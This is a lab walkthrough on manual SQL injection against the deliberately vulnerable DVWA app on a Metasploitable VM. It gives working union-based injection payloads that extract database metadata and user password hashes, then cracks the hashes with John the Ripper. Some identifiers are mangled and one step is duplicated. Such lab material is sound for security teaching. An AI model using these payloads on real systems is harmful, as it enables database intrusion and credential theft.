In this lab, We'll begin the series of SQL Injection. This will be Part-Wise Article/Guide on SQL Injection.
- Let's start from LAB setup ( we will see these steps in detail in future posts) :
Kali Linux (or BT 5r3) VM and Metasploitable VM in NAT mode.
> Check IP address of both devices.
Step-by-step instruction
Step 1:
Open Kali Linux (or BT 5r3)
Step 2:
Open your browser and type http://IP address of
Metasploitable/dvwa/login.php
Step 3:
Login with user name "admin" and password "password"
Step 4:
Click on DVWA Security and set it to low then submit
Step 5:
Click on manual SQL injection
Step 6:
On User ID box type 1 and Submit
(Php select statement: $getid = "SELECT firstname, lastname FROM
users WHERE user_id = '$id'";)
Step 7:
%' or '0'='0
(mysql> SELECT firstname, lastname FROM users WHERE user_id = '%' or
'0'='0';)
Step 8:
Get DB version: %' or 0=0 union select null, version() #
Step 9:
Get DB user: %' or 0=0 union select null, user() #
Step 10:
Get DB user: %' or 0=0 union select null, user() #
Get DB name: %' or 0=0 union select null, database() #
Get Schima information: %' and 1=0 union select null, table_name from
information_schema.tables #
Step 11:
Get user table in Schema information: %' and 1=0 union select null,
tablename from informationschema.tables where table_name like 'user%'#
Get all the columns fields in the information_schema user table: %' and 1=0
union select null, concat(tablename,0x0a,columnname) from
informationschema.columns where tablename = 'users' #
Step 12:
Let's get password authentication hash: %' and 1=0 union select null,
concat(firstname,0x0a,lastname,0x0a,user,0x0a,password) from users #
Now copy all the hash file in a notepad as below format
E.g. user:password
Save it to /pentest/passwords/john by name dvwa_password.txt
Open a console and go to /pentest/passwords/john
cd /pentest/passwords/john
. now lunch john the ripper
./john –format=raw-MD5 dvwa_password.txt and hit enter.
(You will get the passwords)
….Ok Gurkhas, we'll continue this in next part.
Comments
No Comments Exist
Be the first, drop a comment!